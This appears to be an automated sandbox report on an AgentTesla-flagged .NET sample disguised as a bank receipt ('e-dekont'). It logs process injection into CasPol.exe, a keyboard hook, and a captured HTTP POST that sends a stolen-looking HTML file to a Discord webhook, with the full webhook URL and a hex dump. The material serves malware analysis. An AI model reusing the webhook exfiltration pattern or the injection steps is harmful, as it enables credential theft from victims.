
Timestamp	kBytes transferred	Direction	Data
2023-02-07 17:41:32 UTC	0	OUT	POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1 Content-Type: multipart/form-data; boundary=----------42b446e635b543ad97de25b01e6979b4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: discord.com Content-Length: 1224 Expect: 100-continue Connection: Keep-Alive
2023-02-07 17:41:32 UTC	0	IN	HTTP/1.1 100 Continue
2023-02-07 17:41:32 UTC	0	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 62 34 34 36 65 36 33 35 62 35 34 33 61 64 39 37 64 65 32 35 62 30 31 65 36 39 37 39 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 6e 61 6d 65 22 0d 0a 0d 0a 61 6c 66 6f 6e 73 2d 32 38 34 39 39 32 20 32 30 32 33 2d 30 32 2d 30 38 20 30 32 2d 30 30 2d 35 36 2e 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 62 34 34 36 65 36 33 35 62 35 34 33 61 64 39 37 64 65 32 35 62 30 31 65 36 39 37 39 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 66 6f 72 6d 61 74 22 0d 0a 0d 0a 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 Data Ascii: ------------42b446e635b543ad97de25b01e6979b4Content-Disposition: form-data; name="filename"user-284992 2023-02-08 02-00-56.html------------42b446e635b543ad97de25b01e6979b4Content-Disposition: form-data; name="fileformat"html------------4
2023-02-07 17:41:32 UTC	1	IN	HTTP/1.1 404 Not Found Date: Tue, 07 Feb 2023 17:41:32 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=a8ea0446a70e11ed8d802657744d3ae7; Expires=Sun, 06-Feb-2028 17:41:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ strict-transport-security: max-age=31536000; includeSubDomains; preload Via: 1.1 google Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bty7akNoWX6OC4aoE2iHe7LxHQHtrn188ZjWicZIiSBh1heuF9zsXpH9biouDi8l7hbBetRLrMi7Ya7Ieov%2FahcmIdQSLBEYWkkXiRzLyJCYMmwGMyfI%2B0e3oFmC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __sdcfduid=a8ea0446a70e11ed8d802657744d3ae7c23a0232fc8c5f932fd4f6c1c91175609cee1f861eccdf03b6a96c0a50384823; Expires=Sun, 06-Feb-2028 17:41:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Set-Cookie: __cfruid=7623650af91c9a0c1d05a6a7bc2a77b0906cb4ae-1675791692; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 795deabcc9628fdd-FRA {"message": "Unknown Webhook", "code": 10015}

Target ID:	0
Start time:	18:41:24
Start date:	07/02/2023
Path:	C:\Users\user\Desktop\e-dekont-20230206.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\e-dekont-20230206.exe
Imagebase:	0x22e8d880000
File size:	695808 bytes
MD5 hash:	33A5F92DEEE382035467CAFF29A8D487
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Show Windows behavior

Target ID:	1
Start time:	18:41:25
Start date:	07/02/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
Imagebase:	0xc80000
File size:	107624 bytes
MD5 hash:	F866FC1C2E928779C7119353C3091F0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	30
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF9A5D90764 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c68c0f11ba9e08b9c83ed6dbca21500ca125098696f42b2157fa818f288fd04
Instruction ID: 5a1d460ecdadc23982de465565561170c17fec2af07a7f0082d001002e2f14a2
Opcode Fuzzy Hash: 3c68c0f11ba9e08b9c83ed6dbca21500ca125098696f42b2157fa818f288fd04
Instruction Fuzzy Hash: FF91E571A08B4D8FDB95DB6CE894BF97FE0EF6A310F0401BAD04DD7292DA606855CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D997C9 Relevance: 1.9, APIs: 1, Instructions: 368
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 00007FF9A5D99A56

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8210f49c9a331947dd7a848209ecab2764c7ea51af3423ef09c790a5415ea6a4
Instruction ID: cc540ab89fb007afce74e78d8353bc751a9daa35ac91ba82abf88a840490ac5e
Opcode Fuzzy Hash: 8210f49c9a331947dd7a848209ecab2764c7ea51af3423ef09c790a5415ea6a4
Instruction Fuzzy Hash: C8C1F570908A1D8FDB98DF18C894BE9B7F1FB6A311F0011AAD44DE3691DB75AA84CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D97982 Relevance: 1.9, APIs: 1, Instructions: 361
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 00007FF9A5D99A56

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 70e9aa3de4f9de9e00532b368a1b60612104e081a9189cd888c2d815c9d87f86
Instruction ID: d8e6c45c0276034aaab5fe44b92c3ce806bd16388372d27f296bba3155451ead
Opcode Fuzzy Hash: 70e9aa3de4f9de9e00532b368a1b60612104e081a9189cd888c2d815c9d87f86
Instruction Fuzzy Hash: 0DB1E370908A1D8FDB98DF58C894BE9B7F1FB69311F0011AAD44EE3691DB75AA84CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D9A13D Relevance: 1.7, APIs: 1, Instructions: 211
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE ref: 00007FF9A5D9A2AE

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: badfba1600d73641a3f191b31962c8b4abdb402241d5c2e5b0378f5cea29bfe3
Instruction ID: 918e3fd0797c66a5314126cfb4646ec9ed9af94214dbf6cda6e7a53ef46ffb51
Opcode Fuzzy Hash: badfba1600d73641a3f191b31962c8b4abdb402241d5c2e5b0378f5cea29bfe3
Instruction Fuzzy Hash: 45610170908A5D8FDB98DF98C884BE9BBF1FB6A310F1041AED04DE7651DA74A985CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D979E2 Relevance: 1.7, APIs: 1, Instructions: 200
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE ref: 00007FF9A5D9A2AE

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fdd537519130b9b09656045c161fc32ec4cab02f2f1371bcf3a3b6761a401ac8
Instruction ID: 4fe42f0fd4132ce618ee7ba05f805c3e51d891c550fd791dda2c5295b814bd44
Opcode Fuzzy Hash: fdd537519130b9b09656045c161fc32ec4cab02f2f1371bcf3a3b6761a401ac8
Instruction Fuzzy Hash: D151D170A08A1C8FDB98DF98C884BE9BBF1FB69311F1041AED04DE3651DA74A985CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D99DE5 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE ref: 00007FF9A5D99F29

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 340a05e97a286ed414371f472963656d4ecec5a345ca473ee40d1e5309633a6f
Instruction ID: 4df35d3c98e51d0266f495898084d55c97033df3635e5793f3db4bd49668b2e6
Opcode Fuzzy Hash: 340a05e97a286ed414371f472963656d4ecec5a345ca473ee40d1e5309633a6f
Instruction Fuzzy Hash: 0B512170908A4C8FDB98DF58C885BE9BBF0FB6A310F1081AED04DE3251DA74A985CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D979D2 Relevance: 1.7, APIs: 1, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE ref: 00007FF9A5D99F29

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0fe1fb6053d4ea742e27fbfa7a398c1e9d764ba1df34f5ae83cd083cad04c441
Instruction ID: 11830be25886a05ba4d26cd96cb9c572987ba3a272f8c5675311bdbd641ab82d
Opcode Fuzzy Hash: 0fe1fb6053d4ea742e27fbfa7a398c1e9d764ba1df34f5ae83cd083cad04c441
Instruction Fuzzy Hash: BC51EF70908A1C8FDB98DF58C885BE9BBF1FB6A310F1091AED44DE3251DA70A985CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D99F9D Relevance: 1.7, APIs: 1, Instructions: 179
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE ref: 00007FF9A5D9A0D3

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: aa68129c26677e985aaf2ddd29764c006351e91f7332afdac8cdcc4bcaced569
Instruction ID: 82af1fde562ce304305e32305979525bf3a7556d73dd44d0503ad75b5a9e23d3
Opcode Fuzzy Hash: aa68129c26677e985aaf2ddd29764c006351e91f7332afdac8cdcc4bcaced569
Instruction Fuzzy Hash: 0D514830908A4C8FDF98DF58C894BE9BBB1FB6A314F1041AED04DE7252DA30A885CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D97A02 Relevance: 1.7, APIs: 1, Instructions: 167
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE ref: 00007FF9A5D9A0D3

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 248761fe76dbcf52c5a485bcfb7daaef3d8251234f8c971492484b4eef3110bf
Instruction ID: 8d9ac96be33e6a39bc7df4f05d4cf6f42706f3564926dcee170d6257f99d87b2
Opcode Fuzzy Hash: 248761fe76dbcf52c5a485bcfb7daaef3d8251234f8c971492484b4eef3110bf
Instruction Fuzzy Hash: B3510430918A5C8FDF98DF58C844BE9BBB1FB69305F1091AED04EE3251DA70A985CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D99C69 Relevance: 1.7, APIs: 1, Instructions: 166
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32 ref: 00007FF9A5D99D7E

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 66198db966acf7bb58cde5ae163c5fcfa25276b84eeb1e871d9e7c3e3d39390c
Instruction ID: f36cd94089b42fb51f059e017c7dbc13f4802fd323ce86bf8fbefb4a0794f12d
Opcode Fuzzy Hash: 66198db966acf7bb58cde5ae163c5fcfa25276b84eeb1e871d9e7c3e3d39390c
Instruction Fuzzy Hash: 63510870908A4D8FDB94DF99C888BEDBBB1FBA9311F10826AD048D7255D774A989CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D979C2 Relevance: 1.7, APIs: 1, Instructions: 161
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32 ref: 00007FF9A5D99D7E

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6f294d256de33761eb7aacf3d8070914419364360a14ad3f8336bea5939214a7
Instruction ID: 220e3c23f2d5a3c7160b2e8c8f06dd50ef81c6acba9fc81a9927c135b5497866
Opcode Fuzzy Hash: 6f294d256de33761eb7aacf3d8070914419364360a14ad3f8336bea5939214a7
Instruction Fuzzy Hash: FE511A70D08A1D8FDB94DF99C884BE9BBF1FBA9311F10826AD049D3215D774A985CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D979A2 Relevance: 1.7, APIs: 1, Instructions: 161
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32 ref: 00007FF9A5D99D7E

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6f294d256de33761eb7aacf3d8070914419364360a14ad3f8336bea5939214a7
Instruction ID: 220e3c23f2d5a3c7160b2e8c8f06dd50ef81c6acba9fc81a9927c135b5497866
Opcode Fuzzy Hash: 6f294d256de33761eb7aacf3d8070914419364360a14ad3f8336bea5939214a7
Instruction Fuzzy Hash: FE511A70D08A1D8FDB94DF99C884BE9BBF1FBA9311F10826AD049D3215D774A985CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D9A449 Relevance: 1.6, APIs: 1, Instructions: 126
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 00007FF9A5D9A509

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0e4015a3ef8194d7496ca7dbad61f09263d004958f4b81d5879a21a98452fc39
Instruction ID: a48fe4d177ec1428c2f3d2a95da035029128534ac8d635610f4b3f3fae5d35e4
Opcode Fuzzy Hash: 0e4015a3ef8194d7496ca7dbad61f09263d004958f4b81d5879a21a98452fc39
Instruction Fuzzy Hash: C3410670E0864C8FDB98DF98D884BADBBF0FB5A310F10416ED049E7252DA74A886CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D97A12 Relevance: 1.6, APIs: 1, Instructions: 121threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 00007FF9A5D9A509

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7e504211a29566249bdef01c51d24e7693ab22711dda911002949f4402df2790
Instruction ID: 87a4a945f41c44c645cb2268d3bd01819dbaebe25cc2f1dbc77631980302e118
Opcode Fuzzy Hash: 7e504211a29566249bdef01c51d24e7693ab22711dda911002949f4402df2790
Instruction Fuzzy Hash: E931E874A0860C8FDB98DF98D484BADBBB0EB5A311F10416ED04DE7251DA70A885CF51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF9A5D96CAD Relevance: .5, Instructions: 477COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 935dfe913f7fc9be671be70140ad6ad14afdba7f0da8b2d7ccbe98962d120385
Instruction ID: f469aee79335e25fd5be9ce5db698cea295be462a8c5c149ea99e5995d4e1bde
Opcode Fuzzy Hash: 935dfe913f7fc9be671be70140ad6ad14afdba7f0da8b2d7ccbe98962d120385
Instruction Fuzzy Hash: C40213A684E7C24FD7038B749C766913FB0AF23214B0E45EBC4C5CF4A3E158A95AD762

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D90816 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d8007aa99c548243ee3c74174482edb79cf007e3ae73b7f714a4b30514bc8c
Instruction ID: 1abea9bdbbc83c3e324f42a67508a162003d489888ff18240f14da3db8927379
Opcode Fuzzy Hash: 08d8007aa99c548243ee3c74174482edb79cf007e3ae73b7f714a4b30514bc8c
Instruction Fuzzy Hash: E351F862A0DB8D9FE755D7BCA8947F97FE0EF57310F0401BAD089C7292DA642815C741

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 2256, Parent PID: 5124COMMON

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.9%
Total number of Nodes:	76
Total number of Limit Nodes:	10

Executed Functions

Function 06B90290 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06B92078,00000000,00000000), ref: 06B9228B

Strings

o, xrefs: 06B9222A

Memory Dump Source

Source File: 00000001.00000002.560729192.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b90000_CasPol.jbxd

Similarity

API ID: HookWindows
String ID: o
API String ID: 2559412058-252678980
Opcode ID: e71207823ee3bef0f8a9c8e9f20963b7d21d24f2f1b805c6dcddf13716f2c7dc
Instruction ID: e8bf6a7f58cad0aec8c312671ed17a0c7c312a9def429330044eb7b90f79bde6
Opcode Fuzzy Hash: e71207823ee3bef0f8a9c8e9f20963b7d21d24f2f1b805c6dcddf13716f2c7dc
Instruction Fuzzy Hash: 762127B1D102099FDB50DF9AD944BEEBBF5FB88320F10842AE415A7250C774AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06F4E448 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

o, xrefs: 06F4E53F

Memory Dump Source

Source File: 00000001.00000002.560956011.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f40000_CasPol.jbxd

Similarity

API ID:
String ID: o
API String ID: 0-252678980
Opcode ID: fc534fee3a81568c65685e62c0ece3b08622c41838dd6492c13ba742ee0984cd
Instruction ID: 606660e12b0b9767a9d79af1cc6c532eed785754c1d5fecef4c8ac10a34ff34d
Opcode Fuzzy Hash: fc534fee3a81568c65685e62c0ece3b08622c41838dd6492c13ba742ee0984cd
Instruction Fuzzy Hash: 0A41E372E043598FCB00DFA9D8146EEBFF1BF89310F1486AAD415AB650DB749885CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06B92208 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06B92078,00000000,00000000), ref: 06B9228B

Strings

o, xrefs: 06B9222A

Memory Dump Source

Source File: 00000001.00000002.560729192.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b90000_CasPol.jbxd

Similarity

API ID: HookWindows
String ID: o
API String ID: 2559412058-252678980
Opcode ID: fd9326d882c45ba2da09ec3359a56f4eb902a0d9bf55519f18dd22e0c9c4e8d8
Instruction ID: ce7bc6178347cdb2531bc039bf5a3a48d29eb070eb062656094e556012c81a00
Opcode Fuzzy Hash: fd9326d882c45ba2da09ec3359a56f4eb902a0d9bf55519f18dd22e0c9c4e8d8
Instruction Fuzzy Hash: FF2135B1D102099FCB54CFAAC844BEEBBF5FB88720F10842AE415A7250C774AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06B9B399 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,06B9B291,00000800), ref: 06B9B40A

Strings

o, xrefs: 06B9B3BF

Memory Dump Source

Source File: 00000001.00000002.560729192.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b90000_CasPol.jbxd

Similarity

API ID: LibraryLoad
String ID: o
API String ID: 1029625771-252678980
Opcode ID: 363df8b5116a4e1bc41b9f6651c77c100194f27a5aa474097c00c6f95e13996d
Instruction ID: ddeb505162f05590e3c8e24cf49f91f848b91909287ed3a27de8a2bd5445e1e7
Opcode Fuzzy Hash: 363df8b5116a4e1bc41b9f6651c77c100194f27a5aa474097c00c6f95e13996d
Instruction Fuzzy Hash: 6C2103B6D003498FDB10CFAAD844ADEFBF4EB88720F14846EE455A7600C374A585CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06F4CD4C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,06F4E49A), ref: 06F4E587

Strings

o, xrefs: 06F4E53F

Memory Dump Source

Source File: 00000001.00000002.560956011.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f40000_CasPol.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: o
API String ID: 1890195054-252678980
Opcode ID: fc69c2219ce27791ff4991e28a8273b9007bd2fb0e97d805bf1430df75cffcff
Instruction ID: 8ca028fb28b1219bbd31dfff425aed38e283e41101b6806d1360e99e444049af
Opcode Fuzzy Hash: fc69c2219ce27791ff4991e28a8273b9007bd2fb0e97d805bf1430df75cffcff
Instruction Fuzzy Hash: 8A11F2B1D006199BCB10DF9AD8447DEBBF4FB48720F14856AD418B7640D378AA54CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 06B99F54 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,06B9B291,00000800), ref: 06B9B40A

Strings

o, xrefs: 06B9B3BF

Memory Dump Source

Source File: 00000001.00000002.560729192.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b90000_CasPol.jbxd

Similarity

API ID: LibraryLoad
String ID: o
API String ID: 1029625771-252678980
Opcode ID: 299b088522cfb1f368a3deaaec39544e3d2ab280bed7dfcc44c792cd522f2d01
Instruction ID: 95c2a8f84fce7624e9fd88df3d2e0c15e0f805fa667dab391bb37138c6406b77
Opcode Fuzzy Hash: 299b088522cfb1f368a3deaaec39544e3d2ab280bed7dfcc44c792cd522f2d01
Instruction Fuzzy Hash: 6911E4B6D043099FDB10CFAAD884ADEFBF4EB88720F14856AE415A7700C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06B922CA Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06B92078,00000000,00000000), ref: 06B9228B

Memory Dump Source

Source File: 00000001.00000002.560729192.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b90000_CasPol.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: da7ba8bef8e741557746de60bfe2c2d3c48b7e08e3b23c11aa38a6f8939441a3
Instruction ID: 6965bae76bf60c1250703e7ceadcaa6deaebe08e6a65c796cc183e599c5e2c8f
Opcode Fuzzy Hash: da7ba8bef8e741557746de60bfe2c2d3c48b7e08e3b23c11aa38a6f8939441a3
Instruction Fuzzy Hash: DF21D172A043409FC764DB6DD48069EBBF1EF91310B14896ED059DB250CB35A909CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05A3EE21 Relevance: 1.4, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

P@Gp, xrefs: 05A3EEC7

Memory Dump Source

Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd

Similarity

API ID:
String ID: P@Gp
API String ID: 0-1978594688
Opcode ID: b20be8e198cb1939327fd1e2d727f9ccaf70f2a52a23020f14975c7585987fb3
Instruction ID: 9583bef97fd5c381b1bda16e2382e0a4eb00234295b84b69ca1a55e4c57b4e11
